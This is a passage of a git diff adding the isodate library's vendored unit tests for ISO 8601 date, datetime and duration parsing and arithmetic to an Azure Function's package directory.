FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Collect all test suites into one TestSuite instance. +''' + +import unittest +from isodate.tests import (test_date, test_time, test_datetime, test_duration, + test_strf, test_pickle) + + +def test_suite(): + ''' + Return a new TestSuite instance consisting of all available TestSuites. 
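+
+    Running this module directly executes the whole suite via
+    unittest.main(defaultTest='test_suite'), as wired up below.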
+ ''' + return unittest.TestSuite([ + test_date.test_suite(), + test_time.test_suite(), + test_datetime.test_suite(), + test_duration.test_suite(), + test_strf.test_suite(), + test_pickle.test_suite(), + ]) + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3b5dd2e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_date.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_date.cpython-39.pyc new file mode 100644 index 0000000..4db0e02 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_date.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_datetime.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_datetime.cpython-39.pyc new file mode 100644 index 0000000..4359924 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_datetime.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_duration.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_duration.cpython-39.pyc new file mode 100644 index 0000000..582fa82 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_duration.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_pickle.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_pickle.cpython-39.pyc new file mode 100644 index 0000000..d24ff58 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_pickle.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_strf.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_strf.cpython-39.pyc new file mode 100644 index 0000000..78b2c92 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_strf.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_time.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_time.cpython-39.pyc 
new file mode 100644 index 0000000..daf3c61 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/__pycache__/test_time.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_date.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_date.py new file mode 100644 index 0000000..753faf3 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_date.py @@ -0,0 +1,132 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isodate module. +''' +import unittest +from datetime import date +from isodate import parse_date, ISO8601Error, date_isoformat +from isodate import DATE_CENTURY, DATE_YEAR +from isodate import DATE_BAS_MONTH, DATE_EXT_MONTH +from isodate import DATE_EXT_COMPLETE, DATE_BAS_COMPLETE +from isodate import DATE_BAS_ORD_COMPLETE, DATE_EXT_ORD_COMPLETE +from isodate import DATE_BAS_WEEK, DATE_BAS_WEEK_COMPLETE +from isodate import DATE_EXT_WEEK, DATE_EXT_WEEK_COMPLETE + +# the following list contains tuples of ISO date strings and the expected +# result from the parse_date method. A result of None means an ISO8601Error +# is expected. The test cases are grouped into dates with 4 digit years +# and 6 digit years. 
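+# For example, the tuple ('1985W155', date(1985, 4, 12), DATE_BAS_WEEK_COMPLETE)
+# is checked in both directions: parse_date('1985W155') must yield the Friday
+# of ISO week 15 of 1985, and date_isoformat(date(1985, 4, 12),
+# DATE_BAS_WEEK_COMPLETE) must yield '1985W155' again.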
+TEST_CASES = {4: [('19', date(1901, 1, 1), DATE_CENTURY), + ('1985', date(1985, 1, 1), DATE_YEAR), + ('1985-04', date(1985, 4, 1), DATE_EXT_MONTH), + ('198504', date(1985, 4, 1), DATE_BAS_MONTH), + ('1985-04-12', date(1985, 4, 12), DATE_EXT_COMPLETE), + ('19850412', date(1985, 4, 12), DATE_BAS_COMPLETE), + ('1985102', date(1985, 4, 12), DATE_BAS_ORD_COMPLETE), + ('1985-102', date(1985, 4, 12), DATE_EXT_ORD_COMPLETE), + ('1985W155', date(1985, 4, 12), DATE_BAS_WEEK_COMPLETE), + ('1985-W15-5', date(1985, 4, 12), DATE_EXT_WEEK_COMPLETE), + ('1985W15', date(1985, 4, 8), DATE_BAS_WEEK), + ('1985-W15', date(1985, 4, 8), DATE_EXT_WEEK), + ('1989-W15', date(1989, 4, 10), DATE_EXT_WEEK), + ('1989-W15-5', date(1989, 4, 14), DATE_EXT_WEEK_COMPLETE), + ('1-W1-1', None, DATE_BAS_WEEK_COMPLETE)], + 6: [('+0019', date(1901, 1, 1), DATE_CENTURY), + ('+001985', date(1985, 1, 1), DATE_YEAR), + ('+001985-04', date(1985, 4, 1), DATE_EXT_MONTH), + ('+001985-04-12', date(1985, 4, 12), DATE_EXT_COMPLETE), + ('+0019850412', date(1985, 4, 12), DATE_BAS_COMPLETE), + ('+001985102', date(1985, 4, 12), DATE_BAS_ORD_COMPLETE), + ('+001985-102', date(1985, 4, 12), DATE_EXT_ORD_COMPLETE), + ('+001985W155', date(1985, 4, 12), DATE_BAS_WEEK_COMPLETE), + ('+001985-W15-5', date(1985, 4, 12), DATE_EXT_WEEK_COMPLETE), + ('+001985W15', date(1985, 4, 8), DATE_BAS_WEEK), + ('+001985-W15', date(1985, 4, 8), DATE_EXT_WEEK)]} + + +def create_testcase(yeardigits, datestring, expectation, format): + ''' + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + TEST_CASES list, so that a failed test won't stop other tests. + ''' + + class TestDate(unittest.TestCase): + ''' + A test case template to parse an ISO date string into a date + object. + ''' + + def test_parse(self): + ''' + Parse an ISO date string and compare it to the expected value. + ''' + if expectation is None: + self.assertRaises(ISO8601Error, parse_date, datestring, + yeardigits) + else: + result = parse_date(datestring, yeardigits) + self.assertEqual(result, expectation) + + def test_format(self): + ''' + Take date object and create ISO string from it. + This is the reverse test to test_parse. + ''' + if expectation is None: + self.assertRaises(AttributeError, + date_isoformat, expectation, format, + yeardigits) + else: + self.assertEqual(date_isoformat(expectation, format, + yeardigits), + datestring) + + return unittest.TestLoader().loadTestsFromTestCase(TestDate) + + +def test_suite(): + ''' + Construct a TestSuite instance for all test cases. + ''' + suite = unittest.TestSuite() + for yeardigits, tests in TEST_CASES.items(): + for datestring, expectation, format in tests: + suite.addTest(create_testcase(yeardigits, datestring, + expectation, format)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_datetime.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_datetime.py new file mode 100644 index 0000000..ea768e2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_datetime.py @@ -0,0 +1,157 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. 
+# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isodatetime module. +''' +import unittest +from datetime import datetime + +from isodate import parse_datetime, UTC, FixedOffset, datetime_isoformat +from isodate import ISO8601Error +from isodate import DATE_BAS_COMPLETE, TIME_BAS_MINUTE, TIME_BAS_COMPLETE +from isodate import DATE_EXT_COMPLETE, TIME_EXT_MINUTE, TIME_EXT_COMPLETE +from isodate import TZ_BAS, TZ_EXT, TZ_HOUR +from isodate import DATE_BAS_ORD_COMPLETE, DATE_EXT_ORD_COMPLETE +from isodate import DATE_BAS_WEEK_COMPLETE, DATE_EXT_WEEK_COMPLETE + +# the following list contains tuples of ISO datetime strings and the expected +# result from the parse_datetime method. A result of None means an ISO8601Error +# is expected. 
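+# Each tuple reads (input string, expected datetime, strftime format, canonical
+# output); e.g. '1985W155T1015+0400' parses to 1985-04-12 10:15 at a fixed
+# +04:00 offset and formats back to the very same string.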
+TEST_CASES = [('19850412T1015', datetime(1985, 4, 12, 10, 15), + DATE_BAS_COMPLETE + 'T' + TIME_BAS_MINUTE, + '19850412T1015'), + ('1985-04-12T10:15', datetime(1985, 4, 12, 10, 15), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_MINUTE, + '1985-04-12T10:15'), + ('1985102T1015Z', datetime(1985, 4, 12, 10, 15, tzinfo=UTC), + DATE_BAS_ORD_COMPLETE + 'T' + TIME_BAS_MINUTE + TZ_BAS, + '1985102T1015Z'), + ('1985-102T10:15Z', datetime(1985, 4, 12, 10, 15, tzinfo=UTC), + DATE_EXT_ORD_COMPLETE + 'T' + TIME_EXT_MINUTE + TZ_EXT, + '1985-102T10:15Z'), + ('1985W155T1015+0400', datetime(1985, 4, 12, 10, 15, + tzinfo=FixedOffset(4, 0, + '+0400')), + DATE_BAS_WEEK_COMPLETE + 'T' + TIME_BAS_MINUTE + TZ_BAS, + '1985W155T1015+0400'), + ('1985-W15-5T10:15+04', datetime(1985, 4, 12, 10, 15, + tzinfo=FixedOffset(4, 0, + '+0400'),), + DATE_EXT_WEEK_COMPLETE + 'T' + TIME_EXT_MINUTE + TZ_HOUR, + '1985-W15-5T10:15+04'), + ('1985-W15-5T10:15-0430', + datetime(1985, 4, 12, 10, 15, tzinfo=FixedOffset(-4, -30, + '-0430'),), + DATE_EXT_WEEK_COMPLETE + 'T' + TIME_EXT_MINUTE + TZ_BAS, + '1985-W15-5T10:15-0430'), + ('1985-W15-5T10:15+04:45', + datetime(1985, 4, 12, 10, 15, tzinfo=FixedOffset(4, 45, + '+04:45'),), + DATE_EXT_WEEK_COMPLETE + 'T' + TIME_EXT_MINUTE + TZ_EXT, + '1985-W15-5T10:15+04:45'), + ('20110410T101225.123000Z', + datetime(2011, 4, 10, 10, 12, 25, 123000, tzinfo=UTC), + DATE_BAS_COMPLETE + 'T' + TIME_BAS_COMPLETE + ".%f" + TZ_BAS, + '20110410T101225.123000Z'), + ('2012-10-12T08:29:46.069178Z', + datetime(2012, 10, 12, 8, 29, 46, 69178, tzinfo=UTC), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2012-10-12T08:29:46.069178Z'), + ('2012-10-12T08:29:46.691780Z', + datetime(2012, 10, 12, 8, 29, 46, 691780, tzinfo=UTC), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2012-10-12T08:29:46.691780Z'), + ('2012-10-30T08:55:22.1234567Z', + datetime(2012, 10, 30, 8, 55, 22, 123457, tzinfo=UTC), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2012-10-30T08:55:22.123457Z'), + ('2012-10-30T08:55:22.1234561Z', + datetime(2012, 10, 30, 8, 55, 22, 123456, tzinfo=UTC), + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2012-10-30T08:55:22.123456Z'), + ('2014-08-18 14:55:22.123456Z', None, + DATE_EXT_COMPLETE + 'T' + TIME_EXT_COMPLETE + '.%f' + TZ_BAS, + '2014-08-18T14:55:22.123456Z'), + ] + + +def create_testcase(datetimestring, expectation, format, output): + """ + Create a TestCase class for a specific test. + + This allows having a separate TestCase for each test tuple from the + TEST_CASES list, so that a failed test won't stop other tests. + """ + + class TestDateTime(unittest.TestCase): + ''' + A test case template to parse an ISO datetime string into a + datetime object. + ''' + + def test_parse(self): + ''' + Parse an ISO datetime string and compare it to the expected value. + ''' + if expectation is None: + self.assertRaises(ISO8601Error, parse_datetime, datetimestring) + else: + self.assertEqual(parse_datetime(datetimestring), expectation) + + def test_format(self): + ''' + Take datetime object and create ISO string from it. + This is the reverse test to test_parse. + ''' + if expectation is None: + self.assertRaises(AttributeError, + datetime_isoformat, expectation, format) + else: + self.assertEqual(datetime_isoformat(expectation, format), + output) + + return unittest.TestLoader().loadTestsFromTestCase(TestDateTime) + + +def test_suite(): + ''' + Construct a TestSuite instance for all test cases. 
+ ''' + suite = unittest.TestSuite() + for datetimestring, expectation, format, output in TEST_CASES: + suite.addTest(create_testcase(datetimestring, expectation, + format, output)) + return suite + + +# load_tests Protocol +def load_tests(loader, tests, pattern): + return test_suite() + + +if __name__ == '__main__': + unittest.main(defaultTest='test_suite') diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_duration.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_duration.py new file mode 100644 index 0000000..39f1c90 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/isodate/tests/test_duration.py @@ -0,0 +1,606 @@ +############################################################################## +# Copyright 2009, Gerhard Weis +# All rights reserved. +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# * Redistributions of source code must retain the above copyright notice, +# this list of conditions and the following disclaimer. +# * Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# * Neither the name of the authors nor the names of its contributors +# may be used to endorse or promote products derived from this software +# without specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +# CONTRACT, STRICT LIABILITY, OR TORT +############################################################################## +''' +Test cases for the isoduration module. +''' +import unittest +import operator +from datetime import timedelta, date, datetime + +from isodate import Duration, parse_duration, ISO8601Error +from isodate import D_DEFAULT, D_WEEK, D_ALT_EXT, duration_isoformat + +# the following list contains tuples of ISO duration strings and the expected +# result from the parse_duration method. A result of None means an ISO8601Error +# is expected. 
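+# The third element of each value tuple, when not None, is the canonical
+# string expected back from duration_isoformat; e.g. 'PT36H' parses to
+# timedelta(hours=36) but formats back as 'P1DT12H'.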
+PARSE_TEST_CASES = {'P18Y9M4DT11H9M8S': (Duration(4, 8, 0, 0, 9, 11, 0, 9, 18), + D_DEFAULT, None), + 'P2W': (timedelta(weeks=2), D_WEEK, None), + 'P3Y6M4DT12H30M5S': (Duration(4, 5, 0, 0, 30, 12, 0, 6, 3), + D_DEFAULT, None), + 'P23DT23H': (timedelta(hours=23, days=23), + D_DEFAULT, None), + 'P4Y': (Duration(years=4), D_DEFAULT, None), + 'P1M': (Duration(months=1), D_DEFAULT, None), + 'PT1M': (timedelta(minutes=1), D_DEFAULT, None), + 'P0.5Y': (Duration(years=0.5), D_DEFAULT, None), + 'PT36H': (timedelta(hours=36), D_DEFAULT, 'P1DT12H'), + 'P1DT12H': (timedelta(days=1, hours=12), D_DEFAULT, None), + '+P11D': (timedelta(days=11), D_DEFAULT, 'P11D'), + '-P2W': (timedelta(weeks=-2), D_WEEK, None), + '-P2.2W': (timedelta(weeks=-2.2), D_DEFAULT, + '-P15DT9H36M'), + 'P1DT2H3M4S': (timedelta(days=1, hours=2, minutes=3, + seconds=4), D_DEFAULT, None), + 'P1DT2H3M': (timedelta(days=1, hours=2, minutes=3), + D_DEFAULT, None), + 'P1DT2H': (timedelta(days=1, hours=2), D_DEFAULT, None), + 'PT2H': (timedelta(hours=2), D_DEFAULT, None), + 'PT2.3H': (timedelta(hours=2.3), D_DEFAULT, 'PT2H18M'), + 'PT2H3M4S': (timedelta(hours=2, minutes=3, seconds=4), + D_DEFAULT, None), + 'PT3M4S': (timedelta(minutes=3, seconds=4), D_DEFAULT, + None), + 'PT22S': (timedelta(seconds=22), D_DEFAULT, None), + 'PT22.22S': (timedelta(seconds=22.22), 'PT%S.%fS', + 'PT22.220000S'), + '-P2Y': (Duration(years=-2), D_DEFAULT, None), + '-P3Y6M4DT12H30M5S': (Duration(-4, -5, 0, 0, -30, -12, 0, + -6, -3), D_DEFAULT, None), + '-P1DT2H3M4S': (timedelta(days=-1, hours=-2, minutes=-3, + seconds=-4), D_DEFAULT, None), + # alternative format + 'P0018-09-04T11:09:08': (Duration(4, 8, 0, 0, 9, 11, 0, 9, + 18), D_ALT_EXT, None), + # 'PT000022.22': timedelta(seconds=22.22), + } + +# d1 d2 '+', '-', '>' +# A list of test cases to test addition and subtraction between datetime and +# Duration objects. +# Each tuple contains 2 duration strings, and a result string for addition and +# one for subtraction. The last value says whether the first duration is +# greater than the second. +MATH_TEST_CASES = (('P5Y7M1DT9H45M16.72S', 'PT27M24.68S', + 'P5Y7M1DT10H12M41.4S', 'P5Y7M1DT9H17M52.04S', None), + ('PT28M12.73S', 'PT56M29.92S', + 'PT1H24M42.65S', '-PT28M17.19S', False), + ('P3Y7M23DT5H25M0.33S', 'PT1H1.95S', + 'P3Y7M23DT6H25M2.28S', 'P3Y7M23DT4H24M58.38S', None), + ('PT1H1.95S', 'P3Y7M23DT5H25M0.33S', + 'P3Y7M23DT6H25M2.28S', '-P3Y7M23DT4H24M58.38S', None), + ('P1332DT55M0.33S', 'PT1H1.95S', + 'P1332DT1H55M2.28S', 'P1331DT23H54M58.38S', True), + ('PT1H1.95S', 'P1332DT55M0.33S', + 'P1332DT1H55M2.28S', '-P1331DT23H54M58.38S', False)) + + +# A list of test cases to test addition and subtraction of date/datetime +# and Duration objects. They are tested against the results of an +# equally long timedelta duration. 
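+# For instance, date(2008, 2, 29) plus Duration(days=10, hours=12, minutes=20)
+# must give the same result as adding the equally long
+# timedelta(days=10, hours=12, minutes=20).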
+DATE_TEST_CASES = ((date(2008, 2, 29), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (date(2008, 1, 31), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2008, 2, 29), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2008, 1, 31), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2008, 4, 21), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2008, 5, 5), + timedelta(days=10, hours=12, minutes=20), + Duration(days=10, hours=12, minutes=20)), + (datetime(2000, 1, 1), + timedelta(hours=-33), + Duration(hours=-33)), + (datetime(2008, 5, 5), + Duration(years=1, months=1, days=10, hours=12, + minutes=20), + Duration(months=13, days=10, hours=12, minutes=20)), + (datetime(2000, 3, 30), + Duration(years=1, months=1, days=10, hours=12, + minutes=20), + Duration(months=13, days=10, hours=12, minutes=20)), + ) + +# A list of test cases of addition of date/datetime and Duration. The results +# are compared against a given expected result. +DATE_CALC_TEST_CASES = ( + (date(2000, 2, 1), + Duration(years=1, months=1), + date(2001, 3, 1)), + (date(2000, 2, 29), + Duration(years=1, months=1), + date(2001, 3, 29)), + (date(2000, 2, 29), + Duration(years=1), + date(2001, 2, 28)), + (date(1996, 2, 29), + Duration(years=4), + date(2000, 2, 29)), + (date(2096, 2, 29), + Duration(years=4), + date(2100, 2, 28)), + (date(2000, 2, 1), + Duration(years=-1, months=-1), + date(1999, 1, 1)), + (date(2000, 2, 29), + Duration(years=-1, months=-1), + date(1999, 1, 29)), + (date(2000, 2, 1), + Duration(years=1, months=1, days=1), + date(2001, 3, 2)), + (date(2000, 2, 29), + Duration(years=1, months=1, days=1), + date(2001, 3, 30)), + (date(2000, 2, 29), + Duration(years=1, days=1), + date(2001, 3, 1)), + (date(1996, 2, 29), + Duration(years=4, days=1), + date(2000, 3, 1)), + (date(2096, 2, 29), + Duration(years=4, days=1), + date(2100, 3, 1)), + (date(2000, 2, 1), + Duration(years=-1, months=-1, days=-1), + date(1998, 12, 31)), + (date(2000, 2, 29), + Duration(years=-1, months=-1, days=-1), + date(1999, 1, 28)), + (date(2001, 4, 1), + Duration(years=-1, months=-1, days=-1), + date(2000, 2, 29)), + (date(2000, 4, 1), + Duration(years=-1, months=-1, days=-1), + date(1999, 2, 28)), + (Duration(years=1, months=2), + Duration(years=0, months=0, days=1), + Duration(years=1, months=2, days=1)), + (Duration(years=-1, months=-1, days=-1), + date(2000, 4, 1), + date(1999, 2, 28)), + (Duration(years=1, months=1, weeks=5), + date(2000, 1, 30), + date(2001, 4, 4)), + (parse_duration("P1Y1M5W"), + date(2000, 1, 30), + date(2001, 4, 4)), + (parse_duration("P0.5Y"), + date(2000, 1, 30), + None), + (Duration(years=1, months=1, hours=3), + datetime(2000, 1, 30, 12, 15, 00), + datetime(2001, 2, 28, 15, 15, 00)), + (parse_duration("P1Y1MT3H"), + datetime(2000, 1, 30, 12, 15, 00), + datetime(2001, 2, 28, 15, 15, 00)), + (Duration(years=1, months=2), + timedelta(days=1), + Duration(years=1, months=2, days=1)), + (timedelta(days=1), + Duration(years=1, months=2), + Duration(years=1, months=2, days=1)), + (datetime(2008, 1, 1, 0, 2), + Duration(months=1), + datetime(2008, 2, 1, 0, 2)), + (datetime.strptime("200802", "%Y%M"), + parse_duration("P1M"), + datetime(2008, 2, 1, 0, 2)), + (datetime(2008, 2, 1), + Duration(months=1), + datetime(2008, 3, 1)), + (datetime.strptime("200802", "%Y%m"), + 
parse_duration("P1M"), + datetime(2008, 3, 1)), + # (date(2000, 1, 1), + # Duration(years=1.5), + # date(2001, 6, 1)), + # (date(2000, 1, 1), + # Duration(years=1, months=1.5), + # date(2001, 2, 14)), + ) + +# A list of test cases of multiplications of durations +# are compared against a given expected result. +DATE_MUL_TEST_CASES = ( + (Duration(years=1, months=1), + 3, + Duration(years=3, months=3)), + (Duration(years=1, months=1), + -3, + Duration(years=-3, months=-3)), + (3, + Duration(years=1, months=1), + Duration(years=3, months=3)), + (-3, + Duration(years=1, months=1), + Duration(years=-3, months=-3)), + (5, + Duration(years=2, minutes=40), + Duration(years=10, hours=3, minutes=20)), + (-5, + Duration(years=2, minutes=40), + Duration(years=-10, hours=-3, minutes=-20)), + (7, + Duration(years=1, months=2, weeks=40), + Duration(years=8, months=2, weeks=280))) + + +class DurationTest(unittest.TestCase): + ''' + This class tests various other aspects of the isoduration module, + which are not covered with the test cases listed above. + ''' + + def test_associative(self): + ''' + Adding 2 durations to a date is not associative. + ''' + days1 = Duration(days=1) + months1 = Duration(months=1) + start = date(2000, 3, 30) + res1 = start + days1 + months1 + res2 = start + months1 + days1 + self.assertNotEqual(res1, res2) + + def test_typeerror(self): + ''' + Test if TypError is raised with certain parameters. + ''' + self.assertRaises(TypeError, parse_duration, date(2000, 1, 1)) + self.assertRaises(TypeError, operator.sub, Duration(years=1), + date(2000, 1, 1)) + self.assertRaises(TypeError, operator.sub, 'raise exc', + Duration(years=1)) + self.assertRaises(TypeError, operator.add, + Duration(years=1, months=1, weeks=5), + 'raise exception') + self.assertRaises(TypeError, operator.add, 'raise exception', + Duration(years=1, months=1, weeks=5)) + self.assertRaises(TypeError, operator.mul, + Duration(years=1, months=1, weeks=5), + 'raise exception') + self.assertRaises(TypeError, operator.mul, 'raise exception', + Duration(years=1, months=1, weeks=5)) + self.assertRaises(TypeError, operator.mul, + Duration(years=1, months=1, weeks=5), + 3.14) + self.assertRaises(TypeError, operator.mul, 3.14, + Duration(years=1, months=1, weeks=5)) + + def test_parseerror(self): + ''' + Test for unparseable duration string. + ''' + self.assertRaises(ISO8601Error, parse_duration, 'T10:10:10') + + def test_repr(self): + ''' + Test __repr__ and __str__ for Duration objects. + ''' + dur = Duration(10, 10, years=10, months=10) + self.assertEqual('10 years, 10 months, 10 days, 0:00:10', str(dur)) + self.assertEqual('isodate.duration.Duration(10, 10, 0,' + ' years=10, months=10)', repr(dur)) + dur = Duration(months=0) + self.assertEqual('0:00:00', str(dur)) + dur = Duration(months=1) + self.assertEqual('1 month, 0:00:00', str(dur)) + + def test_hash(self): + ''' + Test __hash__ for Duration objects. + ''' + dur1 = Duration(10, 10, years=10, months=10) + dur2 = Duration(9, 9, years=9, months=9) + dur3 = Duration(10, 10, years=10, months=10) + self.assertNotEqual(hash(dur1), hash(dur2)) + self.assertNotEqual(id(dur1), id(dur2)) + self.assertEqual(hash(dur1), hash(dur3)) + self.assertNotEqual(id(dur1), id(dur3)) + durSet = set() + durSet.add(dur1) + durSet.add(dur2) + durSet.add(dur3) + self.assertEqual(len(durSet), 2) + + def test_neg(self): + ''' + Test __neg__ for Duration objects. 
+        '''
+        self.assertEqual(-Duration(0), Duration(0))
+        self.assertEqual(-Duration(years=1, months=1),
+                         Duration(years=-1, months=-1))
+        self.assertEqual(-Duration(years=1, months=1), Duration(months=-13))
+        self.assertNotEqual(-Duration(years=1), timedelta(days=-365))
+        self.assertNotEqual(-timedelta(days=365), Duration(years=-1))
+        # FIXME: this test fails in python 3... it seems like python3
+        # treats a == b the same b == a
